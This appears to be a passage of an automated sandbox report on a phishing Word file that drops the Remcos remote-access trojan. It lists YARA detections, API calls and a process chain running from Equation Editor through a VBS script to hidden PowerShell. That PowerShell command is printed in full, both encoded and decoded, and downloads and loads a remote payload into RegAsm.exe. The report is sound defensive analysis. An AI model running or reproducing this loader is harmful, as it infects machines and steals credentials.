                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0041208C17_2_0041208C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004050A917_2_004050A9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040511A17_2_0040511A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0043C13A17_2_0043C13A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004051AB17_2_004051AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0044930017_2_00449300
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040D32217_2_0040D322
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0044A4F017_2_0044A4F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0043A5AB17_2_0043A5AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0041363117_2_00413631
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0044669017_2_00446690
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0044A73017_2_0044A730
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004398D817_2_004398D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004498E017_2_004498E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0044A88617_2_0044A886
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0043DA0917_2_0043DA09
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00438D5E17_2_00438D5E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00449ED017_2_00449ED0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0041FE8317_2_0041FE83
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00430F5417_2_00430F54
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_004050C218_2_004050C2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_004014AB18_2_004014AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_0040513318_2_00405133
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_004051A418_2_004051A4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_0040124618_2_00401246
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_0040CA4618_2_0040CA46
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_0040523518_2_00405235
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_004032C818_2_004032C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_0040168918_2_00401689
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_00402F6018_2_00402F60
                  Source: ~WRF{6BDC8419-19FD-4A85-B752-6E5B13CC56D9}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004169A7 appears 87 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004165FF appears 35 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434801 appears 41 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00422297 appears 42 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434E70 appears 54 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00402093 appears 50 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0044DB70 appears 41 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00401E65 appears 35 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00444B5A appears 37 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00413025 appears 79 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00416760 appears 69 times
                  Source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 12.2.powershell.exe.3900b60.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 12.2.powershell.exe.3900b60.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 12.2.powershell.exe.3900b60.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 12.2.powershell.exe.3900b60.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 12.2.powershell.exe.3900b60.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 0000000C.00000002.443572410.0000000003279000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0000000C.00000002.443572410.0000000003499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 3864, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: powershell.exe PID: 3952, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 3952, type: MEMORYSTRMatched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: Process Memory Space: powershell.exe PID: 3952, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: RegAsm.exe PID: 4076, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethedomaindskilltechnologywhichcreatednicepersonentirelifetogetbmebackwithnewthingswithichhonestthingsalwayswantobe______seiscutebabygirlever[1].doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A16B3B5D.doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drBinary or memory string: org.slneighbors
                  Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winDOCX@34/33@10/6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,16_2_004182CE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,13_2_0041798D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_00410DE1 GetCurrentProcess,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,18_2_00410DE1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,16_2_00418758
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,13_2_0040F4AF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource,13_2_0041B539
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,13_2_0041AADB
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$G Cargo Logistic.docxJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-EPF38I
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRA8FB.tmpJump to behavior
                  Source: AMG Cargo Logistic.docxOLE indicator, Word Document stream: true
                  Source: AMG Cargo Logistic.docxOLE indicator, Word Document stream: true
                  Source: AMG Cargo Logistic.docxOLE document summary: title field not present or empty
                  Source: AMG Cargo Logistic.docxOLE document summary: title field not present or empty
                  Source: ~WRF{6BDC8419-19FD-4A85-B752-6E5B13CC56D9}.tmp.0.drOLE document summary: title field not present or empty
                  Source: ~WRF{6BDC8419-19FD-4A85-B752-6E5B13CC56D9}.tmp.0.drOLE document summary: edited time not present or 0
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithherimagesverygoodforyourhear.Vbs"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: HandleInformationJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: RegAsm.exe, RegAsm.exe, 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                  Source: RegAsm.exe, RegAsm.exe, 00000011.00000002.464968564.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                  Source: RegAsm.exe, 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                  Source: RegAsm.exe, RegAsm.exe, 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                  Source: RegAsm.exe, RegAsm.exe, 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                  Source: RegAsm.exe, RegAsm.exe, 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                  Source: RegAsm.exe, RegAsm.exe, 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                  Source: AMG Cargo Logistic.docxReversingLabs: Detection: 13%
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
                  Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithherimagesverygoodforyourhear.Vbs"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtTdHJJbkddJHZlUmJvc0VQUkVmZVJFTkNFKVsxLDNdKydYJy1Kb2luJycpICgoKCd7Mn0nKyd1cicrJ2wnKycgPSB7JysnMX0nKydodCcrJ3QnKydwJysnczovLycrJ3InKydhJysndy5naXRoJysndWJ1c2VyY29udGVudC4nKydjJysnb20vTicrJ29EZXRlY3RPJysnbi8nKydOJysnb0RldGUnKydjJysndE9uLycrJ3InKydlZnMnKycvaGVhZHMvbWEnKydpbi8nKydEZXRhJysnaE5vdGgtJysnVi50JysneHR7MX07IHsyfWJhc2UnKyc2NENvbnRlbnQgPSAoTmV3LU9iJysnamVjdCBTeXN0ZW0nKycuJysnTmV0LlcnKydlYkNsaWVudCkuRG8nKyd3bmxvYWRTdHJpJysnbmcoezJ9dXJsKTsnKycgezInKyd9YmluYXInKyd5Q29udGVudCA9IFtTeXN0ZW0uJysnQ29udmUnKydydF06OkZyJysnb21CYScrJ3NlNjRTJysndCcrJ3JpbmcoezJ9YmFzZTY0Q29udGUnKydudCk7IHsyfWFzc2VtYmx5ID0gJysnW1JlZmxlJysnY3RpbycrJ24uQXNzZW1ibHldOjpMJysnb2FkKHsyJysnfWJpJysnbmEnKydyJysneUMnKydvbnRlJysnbnQpOyBbJysnZG5sJysnaWIuJysnSU8uJysnSG9tJysnZV06OicrJ1YnKydBSScrJygnKyd7MH10eCcrJ3QuQycrJ0ZEUicrJ1JXLycrJzA4Lzc3MS42JysnOS40MzEuMTkvLzpwdCcrJ3RoezB9LCB7MH1kZXNhdGl2JysnYWRveycrJzB9JysnLCB7MH1kZXNhJysndGl2YWRveycrJzB9LCcrJyB7MH1kZXNhdGl2JysnYWRvezAnKyd9LCB7MH0nKydSZWdBcycrJ217MH0nKycsIHsnKycwJysnfScrJ3snKycwfSx7MH17MCcrJ30pJykgLWYgIFtDaEFyXTM0LFtDaEFyXTM5LFtDaEFyXTM2KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([StrInG]$veRbosEPREfeRENCE)[1,3]+'X'-Join'') ((('{2}'+'ur'+'l'+' = {'+'1}'+'ht'+'t'+'p'+'s://'+'r'+'a'+'w.gith'+'ubusercontent.'+'c'+'om/N'+'oDetectO'+'n/'+'N'+'oDete'+'c'+'tOn/'+'r'+'efs'+'/heads/ma'+'in/'+'Deta'+'hNoth-'+'V.t'+'xt{1}; {2}base'+'64Content = (New-Ob'+'ject System'+'.'+'Net.W'+'ebClient).Do'+'wnloadStri'+'ng({2}url);'+' {2'+'}binar'+'yContent = [System.'+'Conve'+'rt]::Fr'+'omBa'+'se64S'+'t'+'ring({2}base64Conte'+'nt); {2}assembly = '+'[Refle'+'ctio'+'n.Assembly]::L'+'oad({2'+'}bi'+'na'+'r'+'yC'+'onte'+'nt); ['+'dnl'+'ib.'+'IO.'+'Hom'+'e]::'+'V'+'AI'+'('+'{0}tx'+'t.C'+'FDR'+'RW/'+'08/771.6'+'9.431.19//:pt'+'th{0}, {0}desativ'+'ado{'+'0}'+', {0}desa'+'tivado{'+'0},'+' {0}desativ'+'ado{0'+'}, {0}'+'RegAs'+'m{0}'+', {'+'0'+'}'+'{'+'0},{0}{0'+'})') -f [ChAr]34,[ChAr]39,[ChAr]36))"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\zdcjgmqajuavikmhtgirxawvvrrtkae"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\zdcjgmqajuavikmhtgirxawvvrrtkae"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\zdcjgmqajuavikmhtgirxawvvrrtkae"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\jxitgxaufcsasqatkrvsifqmdfiulluzow"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\manmhp"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ohjddwfhhgpyhybdvgvfatodxp"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ohjddwfhhgpyhybdvgvfatodxp"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qjoweoqbvohlrmpherihlgjmywoyg"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qjoweoqbvohlrmpherihlgjmywoyg"
